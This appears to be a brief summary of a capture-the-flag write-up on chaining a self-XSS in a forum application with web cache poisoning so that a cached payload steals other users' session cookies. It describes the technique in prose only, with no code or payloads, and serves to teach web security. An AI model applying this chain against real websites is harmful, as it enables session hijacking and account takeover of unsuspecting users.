Business CTF 2022: Chaining Self XSS with Cache Poisoning - Felonious Forums
This CTF write-up shows how a nominally low-impact self-XSS in a forum application can be turned into a real account-compromise issue by chaining it with web cache poisoning. The attack relies on getting attacker-controlled client-side content cached and then served to other users, which causes JavaScript that should only run in the attacker’s own session to execute in a victim’s browser instead. Once the poisoned response is replayed cross-user, the payload can exfiltrate the victim’s session cookie and enable session hijacking. The technique is valuable beyond the challenge because it illustrates how cache behavior can upgrade a self-only bug into a broadly exploitable client-side vulnerability.
This post is licensed under CC BY 4.0 by the author.